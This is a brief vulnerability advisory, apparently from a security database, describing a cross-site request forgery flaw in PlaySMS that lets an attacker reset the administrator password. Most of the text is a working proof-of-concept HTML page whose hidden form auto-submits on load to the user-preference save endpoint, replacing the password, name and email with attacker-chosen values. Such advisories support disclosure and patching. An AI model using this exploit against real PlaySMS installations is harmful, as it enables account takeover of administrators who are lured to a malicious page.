|
|
PlaySMS Change Admin Password Cross Site Request Forgery Vulnerability
To exploit this issue an attacker must entice an unsuspecting victim to view a malicious webpage. The following exploit code is available: <html> <body onload="javascript:document.forms[0].submit()"> <form name="ex"action="http://www.example.com/playsms/web/index.php?app=menu&inc=user_pref&op=user_pref_save" method=post enctype="multipart/form-data"> <input type=hidden size=30 maxlength=30 name=up_password value="admin"> <input type=hidden size=30 maxlength=30 name=up_password_conf value="admin"> <input type=hidden size=30 maxlength=100 name=up_name value="admin"> <input type=hidden size=30 maxlength=30 name=up_email value="admin@gmail.com"> <td><input type=hidden size=30 maxlength=250 name=up_address value=""></td> <td><input type=hidden size=30 maxlength=100 name=up_city value=""></td> <td><input type=hidden size=30 maxlength=100 name=up_state value=""></td> <td><input type=hidden size=10 maxlength=10 name=up_zipcode value=""></td> <input type=submit class=button value='Save'> </form> </html> |
|
Privacy Statement |